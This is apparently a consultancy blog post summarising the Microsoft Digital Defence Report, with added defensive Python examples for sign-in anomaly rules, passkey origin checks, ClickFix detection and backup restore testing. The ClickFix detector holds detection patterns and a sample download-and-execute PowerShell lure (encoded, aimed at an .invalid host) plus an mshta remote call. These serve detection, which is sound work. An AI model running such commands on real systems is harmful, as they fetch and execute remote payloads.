
Microsoft Digital Defence Report: What Organisations Need to Know in 2026

BY PROFESSIONAL ADVANTAGE - 5 MINS READ

The latest Microsoft Digital Defence Report (MDDR) has once again highlighted the rapidly evolving threat landscape and the urgent need for organisations to rethink their security posture. During a recent internal business timeout meeting, our consultants walked us through the report’s findings and unpacked what they mean for organisations across Australia and beyond.

This blog summarises those insights, focusing on practical takeaways organisations can act on now.

Summary of the Microsoft Digital Defence Report 2025

1) Attackers are logging in, not breaking in.

One of the report's core themes is the shift from traditional "break‑in" attacks toward credential‑based access. Stolen passwords, hijacked session tokens and compromised workload identities are now the primary entry points. This matters because a sign‑in with valid credentials produces the same success event as a legitimate one: nothing fails, nothing is exploited, and signature‑based detection has nothing to match. Detection therefore has to come from context (device, location, timing, volume of activity) rather than from the sign‑in itself. How to protect your organisation:

  • Implement identity protection tools that detect unusual sign‑ins.
  • Use behaviour‑based analytics to catch anomalies (e.g., impossible travel, mass download activity).
  • Strengthen detection with SIEM solutions such as Microsoft Sentinel.
  • Consolidate logs across cloud and on‑premises systems for full visibility.
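The two behaviour rules named above, worked through as an added example (this is not code from Professional Advantage, Microsoft or the report). It runs an impossible‑travel rule and a mass‑download rule over a handful of constructed audit events; the event shape, the city coordinates and the thresholds (900 km/h, 50 files in 10 minutes) are assumptions a SOC would tune. In Microsoft Sentinel the same logic would be a KQL analytics rule over the sign‑in and Office activity tables.

```python
"""Behaviour-based sign-in analytics over constructed audit events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlam = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def impossible_travel(events, max_speed_kmh=900.0):
    """Flag consecutive successful sign-ins by one user whose implied speed exceeds an airliner's."""
    by_user = defaultdict(list)
    for e in events:
        if e["type"] == "SignIn" and e.get("result", "Success") == "Success":
            by_user[e["user"]].append(e)
    alerts = []
    for user, logins in by_user.items():
        logins.sort(key=lambda e: parse_ts(e["time"]))
        for prev, cur in zip(logins, logins[1:]):
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            hours = (parse_ts(cur["time"]) - parse_ts(prev["time"])).total_seconds() / 3600
            hours = max(hours, 1 / 3600)   # two sign-ins in the same second: treat as one second apart
            speed = km / hours
            if speed > max_speed_kmh:
                alerts.append({"rule": "ImpossibleTravel", "user": user,
                               "from_ip": prev["ip"], "to_ip": cur["ip"],
                               "km": round(km), "minutes": round(hours * 60), "kmh": round(speed)})
    return alerts


def mass_download(events, window=timedelta(minutes=10), threshold=50):
    """Flag a user whose FileDownloaded events in any sliding window reach the threshold."""
    by_user = defaultdict(list)
    for e in events:
        if e["type"] == "FileDownloaded":
            by_user[e["user"]].append(parse_ts(e["time"]))
    alerts = []
    for user, times in by_user.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:      # slide the window's left edge forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"rule": "MassDownload", "user": user, "files_in_window": peak})
    return alerts


def run_rules(events):
    return impossible_travel(events) + mass_download(events)


# Constructed sample telemetry (not real logs). Coordinates are approximate city centres.
EVENTS = [
    {"user": "alice", "type": "SignIn", "time": "2025-11-03T08:02:00Z",
     "ip": "203.0.113.5", "lat": -33.87, "lon": 151.21},    # Sydney
    {"user": "alice", "type": "SignIn", "time": "2025-11-03T08:41:00Z",
     "ip": "198.51.100.7", "lat": 52.37, "lon": 4.90},      # Amsterdam, 39 minutes later
    {"user": "bob", "type": "SignIn", "time": "2025-11-03T09:00:00Z",
     "ip": "203.0.113.9", "lat": -37.81, "lon": 144.96},    # Melbourne
    {"user": "bob", "type": "SignIn", "time": "2025-11-03T17:30:00Z",
     "ip": "203.0.113.22", "lat": -33.87, "lon": 151.21},   # Sydney, 8.5 hours later
]
# Sixty downloads by alice in six minutes, right after the suspicious sign-in.
EVENTS += [{"user": "alice", "type": "FileDownloaded", "file": f"doc{i:02d}.docx",
            "time": f"2025-11-03T08:{45 + i // 10}:{(i % 10) * 6:02d}Z"} for i in range(60)]
# Five downloads by bob spread over the working day: normal.
EVENTS += [{"user": "bob", "type": "FileDownloaded", "file": f"report{i}.xlsx",
            "time": f"2025-11-03T{10 + i}:00:00Z"} for i in range(5)]

if __name__ == "__main__":
    for alert in run_rules(EVENTS):
        print(alert)
```

Both rules only work if the sign‑in and file‑activity logs end up in the same place with synchronised timestamps, which is the practical reason behind the "consolidate logs" bullet: the Sydney sign‑in, the Amsterdam sign‑in and the sixty downloads come from three different sources.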

2) Why Sentinel still matters even if you’re using Microsoft Defender.

A key part of the discussion centred around whether organisations need Microsoft Sentinel if they already use Microsoft Defender. The consensus: Defender provides strong protection out of the box, but Sentinel unlocks deeper visibility, correlation, and automation, especially in hybrid or complex environments. Sentinel adds value by:

  • Ingesting logs from multiple security and infrastructure sources.
  • Highlighting suspicious patterns that might go unnoticed.
  • Enabling custom automated responses.
  • Supporting non‑Microsoft systems like firewalls or third‑party applications.

For smaller or simpler environments, Defender alone may be sufficient. But for organisations with hybrid infrastructure, industry‑specific compliance needs, or multiple security tools, Sentinel becomes a crucial SIEM/SOAR layer.

3) Phishing-resistant MFA blocks 99% of attacks.

The team shared real-world experiences underscoring just how effective phishing-resistant MFA (passkeys and FIDO2 security keys, Windows Hello for Business, certificate-based authentication) has become. Modern phishing-resistant MFA:

  • Uses a private key that stays on the device (or with the user's passkey provider) and is unlocked locally with a biometric or PIN; the user never types a code or password that could be captured.
  • Cannot be relayed through an adversary-in-the-middle phishing proxy, because the signed response is bound to the origin the user is actually on: a response produced on a look-alike domain is rejected by the genuine site.
  • Gives attackers no push prompt to spam (MFA fatigue) and no one-time code to ask the user for.

Moving from traditional MFA (codes, SMS, prompts) to phishing-resistant MFA dramatically reduces risk. Organisations are increasingly enabling it, especially on privileged accounts.
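The origin binding that makes a relayed passkey response useless, shown as an added example (not code from the page, Microsoft or the report). It performs the server‑side origin, challenge and relying‑party checks of a WebAuthn assertion and simulates the genuine site and an adversary‑in‑the‑middle proxy answering the same challenge. The final signature check over authenticatorData || sha256(clientDataJSON) is omitted because it needs an ECDSA library; RP_ID and the .evil domain are assumed, illustrative values.

```python
"""Why an adversary-in-the-middle phishing proxy cannot reuse a passkey sign-in (added example)."""
import base64
import hashlib
import json
import os

RP_ID = "login.example.com"                 # assumed relying-party ID of the genuine site
EXPECTED_ORIGIN = "https://" + RP_ID
FLAG_UP, FLAG_UV = 0x01, 0x04               # user-present / user-verified bits in the flags byte


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def new_challenge() -> bytes:
    return os.urandom(32)


def browser_client_data(page_origin: str, challenge: bytes) -> bytes:
    """clientDataJSON as the browser serialises it: the origin is filled in by the browser,
    not by the page, so a phishing page cannot lie about where the user really is."""
    return json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                       "origin": page_origin}).encode()


def authenticator_data(rp_id: str, counter: int = 1, flags: int = FLAG_UP | FLAG_UV) -> bytes:
    """rpIdHash (32 bytes) || flags (1 byte) || signCount (4 bytes, big-endian)."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + counter.to_bytes(4, "big")


def verify_assertion(client_data_json: bytes, auth_data: bytes, issued_challenge: bytes):
    """Checks the genuine site performs before verifying the signature. Returns (ok, reason)."""
    try:
        cd = json.loads(client_data_json)
    except ValueError:
        return False, "clientDataJSON is not valid JSON"
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != b64url(issued_challenge):
        return False, "challenge mismatch (stale or replayed response)"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin mismatch: response came from {cd.get('origin')!r}"
    if len(auth_data) < 37:
        return False, "authenticatorData too short"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch: credential belongs to a different relying party"
    flags = auth_data[32]
    if not flags & FLAG_UP:
        return False, "user presence not asserted"
    if not flags & FLAG_UV:
        return False, "user verification (biometric or PIN) not asserted"
    return True, "ok"


def scenario(page_origin: str, issued_challenge: bytes):
    """Simulate the user's browser on `page_origin` answering the genuine site's challenge.
    The browser derives the rpId from the page's own effective domain, so a look-alike domain
    relaying the real challenge still produces a response bound to the look-alike."""
    rp_id_seen_by_browser = page_origin.split("://", 1)[1]
    cd = browser_client_data(page_origin, issued_challenge)
    ad = authenticator_data(rp_id_seen_by_browser)
    return verify_assertion(cd, ad, issued_challenge)


if __name__ == "__main__":
    c = new_challenge()
    print("genuine site :", scenario("https://login.example.com", c))
    print("AiTM proxy   :", scenario("https://login.example-com.evil", c))
```

In practice the user on the look‑alike domain usually cannot complete the ceremony at all, because the authenticator holds no credential for that domain's rpId; the server‑side origin and rpIdHash checks are the backstop that makes a relayed response worthless even if one is produced. Contrast this with a one‑time code or push approval, which carries nothing that ties it to the site the user was looking at.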

4) Social engineering and “click‑fix” attacks are surging.

“Click‑fix” (ClickFix) attacks, where users are tricked into running a malicious command themselves, are now among the most common initial access methods. The typical lure is a fake CAPTCHA, fake virus warning, browser error or “fix” dialog that tells the user to press Win+R (or open a terminal), paste a command the page has already placed on the clipboard, and hit Enter. That command, usually PowerShell or mshta, fetches and runs the real payload. Because the user launches it, the process tree starts from explorer.exe or the browser rather than from a malicious document or an exploit, and no vulnerability is needed.

Organisations can combat this by training users never to paste commands that a website tells them to run, and by enabling endpoint protection that blocks unauthorised scripts and suspicious behaviour: attack surface reduction rules, PowerShell script‑block logging, and alerting on a scripting host (powershell.exe, mshta.exe, cmd.exe) spawned from the Run dialog or a browser with hidden‑window, encoded‑command or download‑and‑execute arguments.
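What that endpoint alert looks like as logic, given as an added example (not code from the page, Microsoft or the report). It scores constructed process‑creation events on the ClickFix traits described above: a scripting host whose parent is explorer.exe or a browser, a hidden window, an encoded command (which it decodes and inspects), and in‑memory or remote‑fetch execution. The event fields, patterns and the two‑indicator threshold are assumptions a SOC would tune; the sample command line only references an .invalid hostname.

```python
"""Heuristic ClickFix detection over constructed process-creation events (added example)."""
import base64
import re

# Scripting hosts a user-driven ClickFix lure typically ends up launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parents that mean "a person did this": the Run dialog (explorer.exe) or a browser.
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring", "remote fetch"),
    (r"\bmshta(?:\.exe)?\s+https?://", "mshta remote HTA"),
    (r"\bcurl\b.*\|\s*(?:ba)?sh\b", "curl piped to shell"),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """List the ClickFix indicators present in one process-creation event."""
    reasons = []
    if event["parent"].lower() in USER_PARENTS and event["image"].lower() in SCRIPT_HOSTS:
        reasons.append("scripting host launched from Run dialog or browser")
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command")
        text += "\n" + decoded            # inspect what the encoding was hiding
    for pattern, why in INDICATORS:
        if re.search(pattern, text, re.I):
            reasons.append(why)
    return reasons


def find_clickfix(events, min_indicators=2):
    return [{"pid": e["pid"], "user": e["user"], "reasons": r}
            for e in events if len(r := score_event(e)) >= min_indicators]


# Constructed sample telemetry (not real EDR output). PAYLOAD is the inert command a lure
# page would have put on the clipboard; it only refers to an .invalid hostname.
PAYLOAD = "iex (irm https://cdn.example.invalid/fix.ps1)"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
EVENTS = [
    {"pid": 4120, "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -w hidden -ep bypass -enc {ENCODED}"},
    {"pid": 4188, "user": "SYSTEM", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"pid": 4301, "user": "carol", "parent": "msedge.exe", "image": "mshta.exe",
     "cmdline": "mshta https://captcha-verify.example.invalid/v.hta"},
    {"pid": 4377, "user": "dave", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Process | Sort-Object CPU"},
]

if __name__ == "__main__":
    for alert in find_clickfix(EVENTS):
        print(alert)
```

The scheduled backup script and the administrator's interactive PowerShell are left alone because neither has the user‑driven parent nor the obfuscation traits; the two lures are caught even though one of them never used PowerShell at all. Decoding the -EncodedCommand argument before matching is what turns an opaque blob into "download and execute", so a real rule should always do it.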

5) Data exfiltration is the new normal.

Modern attacks increasingly focus on stealing data rather than immediately encrypting it. Microsoft Purview tools, such as Data Loss Prevention (DLP) and Insider Risk Management, were highlighted as essential for detecting unusual data movement, blocking attempted data extraction, and monitoring high-risk user behaviour.

6) Cloud and hybrid environments are prime targets.

The report emphasises that hybrid setups (a mix of cloud and on‑premises systems) have an expanded attack surface. Weak on‑premises security can serve as an entry point into the cloud through identity synchronisation or integrated services. This reinforces the need for:

  • Consistent security controls across all environments.
  • Consolidated monitoring.
  • Enforced least‑privilege access and Zero Trust principles.

7) AI is accelerating the speed and scale of cyber-attacks.

AI is now being widely used by attackers to automate reconnaissance, craft convincing phishing campaigns, and exploit known vulnerabilities. While AI brings tremendous benefits for defenders, organisations must also:

  • Strengthen detection and response capabilities.
  • Continuously review AI governance and security controls.
  • Evaluate tools like Microsoft Security Copilot as part of a modern defence strategy.

8) Nation-state threat activity remains high.

The report reiterates ongoing geopolitical‑driven cyber activity. Industries tied to government, critical infrastructure or national exports remain potential targets. While motivations vary, financial gain remains the dominant driver of cybercrime globally.

9) Organisations must assume breach and test their readiness.

One of the most practical insights discussed was the need for regular backup testing and recovery rehearsals. The team reflected that while many organisations have backup solutions in place, few actively test restoration processes. Our cybersecurity consultants recommended these actions:

  • Conduct scheduled test restores several times a year.
  • Document outcomes and improve procedures.
  • Include disaster recovery and ransomware simulations.
  • Build this into managed service contracts where applicable.
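A scripted test restore of the kind the consultants recommend, as an added example (not code from Professional Advantage or from any backup product). It restores an archive into a scratch directory and checks every file against a manifest of hashes recorded at backup time, so a "successful" restore that silently returns corrupted or missing files is reported as a failure rather than logged as a pass. The archive, file names and the simulated corruption are constructed in memory so it runs offline; a real job would point restore_and_verify() at the archive pulled back from the backup system.

```python
"""A scripted test restore with integrity verification (added example)."""
import hashlib
import io
import tarfile
import tempfile
from pathlib import Path


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_backup(files: dict) -> tuple:
    """Write files into an uncompressed tar in memory and return (archive_bytes, manifest).
    The manifest (path -> sha256) must be stored apart from the archive, otherwise whatever
    corrupts or tampers with the archive can also rewrite the expected hashes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    manifest = {name: sha256_hex(data) for name, data in files.items()}
    return buf.getvalue(), manifest


def restore_and_verify(archive: bytes, manifest: dict) -> dict:
    """Restore into a throwaway directory and report ok / corrupt / missing / unexpected files."""
    report = {"ok": [], "corrupt": [], "missing": [], "unexpected": []}
    with tempfile.TemporaryDirectory() as scratch:
        with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
            members = tar.getmembers()
            # Never trust archive paths: a tampered backup could try to write outside scratch.
            for m in members:
                if m.name.startswith("/") or ".." in Path(m.name).parts:
                    raise ValueError(f"unsafe path in archive: {m.name}")
            try:
                tar.extractall(scratch, filter="data")   # Python 3.12+ (backported to 3.8.17+)
            except TypeError:                              # older interpreters lack the filter argument
                tar.extractall(scratch)
            report["unexpected"] = sorted(m.name for m in members if m.isfile() and m.name not in manifest)
        for name, expected in sorted(manifest.items()):
            path = Path(scratch) / name
            if not path.is_file():
                report["missing"].append(name)
            elif sha256_hex(path.read_bytes()) != expected:
                report["corrupt"].append(name)
            else:
                report["ok"].append(name)
    report["passed"] = not (report["corrupt"] or report["missing"])
    return report


def flip_byte_in_content(archive: bytes, marker: bytes) -> bytes:
    """Simulate silent media corruption: flip one byte inside a file's data block.
    Tar header checksums do not cover file data, so extraction still 'succeeds'."""
    idx = archive.find(marker)
    if idx < 0:
        raise ValueError("marker not found")
    damaged = bytearray(archive)
    damaged[idx] ^= 0xFF
    return bytes(damaged)


# Constructed sample backup set (not real data).
FILES = {
    "db/customers.sql": b"INSERT INTO customers VALUES (1, 'example');\n",
    "config/app.ini": b"[app]\nmode=prod\n",
    "docs/runbook.md": b"# Restore runbook\n1. Pull archive. 2. Verify hashes.\n",
}

if __name__ == "__main__":
    archive, manifest = make_backup(FILES)
    print("clean archive  :", restore_and_verify(archive, manifest))
    print("damaged archive:", restore_and_verify(flip_byte_in_content(archive, b"INSERT INTO"), manifest))
```

The report dictionary is the artefact to keep: a dated record of which files restored cleanly is the "document outcomes" step, and a run that returns passed=False is exactly the finding a quarterly restore test exists to surface before a real incident does.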

Microsoft’s Top Security Recommendations for 2026

The Microsoft Digital Defence Report outlined several strategic priorities for organisations:

  • Treat cybersecurity as a business‑level risk. Use measurable KPIs such as patching speed, MFA coverage, detection and response times, and data classification completeness.
  • Enforce phishing‑resistant MFA everywhere, especially for admins and executives.
  • Adopt Zero Trust as the security foundation. This identity‑driven approach enforces least‑privilege access and reduces risk by assuming no user or device is inherently trusted.
  • Strengthen data protection with Purview. Implement DLP, sensitivity labels and insider‑risk monitoring.
  • Leverage AI‑powered defence. Use tools that enhance detection, automate correlation, and accelerate incident response.
  • Improve AI governance. Establish clear policies around AI usage, model security, and data boundaries.
  • Begin long‑term planning for post‑quantum cryptography. While still emerging, the shift will fundamentally change encryption standards.

Conclusion

The Microsoft Digital Defence Report makes one thing clear: Security is no longer just about tools. It’s about strategy, integration, and constant readiness. From strengthening identity protection to testing backups, improving visibility and adopting phishing‑resistant MFA, there are clear steps organisations can take today to improve their security posture.

If you would like help implementing any of the best practices discussed or want support evaluating your current security landscape, please reach out. This is the perfect time to strengthen your defences for 2026 and beyond.
